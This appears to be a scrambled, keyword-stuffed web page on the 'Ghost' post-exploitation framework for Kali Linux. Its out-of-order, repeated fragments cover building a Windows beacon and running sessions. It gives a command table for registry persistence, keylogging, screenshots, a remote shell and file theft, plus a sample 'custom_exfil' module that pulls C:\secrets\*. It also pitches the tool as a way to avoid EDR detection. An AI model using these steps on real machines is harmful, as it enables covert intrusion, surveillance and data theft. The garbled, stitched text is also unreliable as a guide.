ghost > sessions -i 1 Inside an active session, you can load modules:
Enter .
class GhostModule: def __init__(self): self.info = "Name": "custom_exfil", "Author": "you" def run(self, session, args): # Your post-ex logic here return session.download("C:\\secrets\\*") ghost framework kali linux github
Ghost is perfect for CTFs, OSCP labs, and quick internal assessments where you don't want to trigger EDR with standard Metasploit patterns. Customizing from GitHub Source Since you have the repo, you can write your own modules. Ghost modules live in ghost/modules/ . The structure is dead simple:
ghost > sessions Interact with session ID 1: ghost > sessions -i 1 Inside an active
The primary workflow is: build -> deploy -> listen -> interact . 1. Create a payload (Windows example) ghost > build windows/x64 my_beacon.exe This generates a position-independent executable. Use UPX if you want smaller size:
ghost You should see the ASCII banner and a prompt: Ghost > Ghost modules live in ghost/modules/
| Command | What it does | |---------|---------------| | sysinfo | OS, hostname, architecture, uptime | | persist | Install startup persistence (Registry/Run key) | | keylog | Capture keystrokes from the target | | screenshot | Grab remote desktop (Windows GDI) | | shell | Drop into an interactive cmd.exe | | upload /local/path /remote/path | Exfil tools | | download C:\secret\data.txt | Steal files |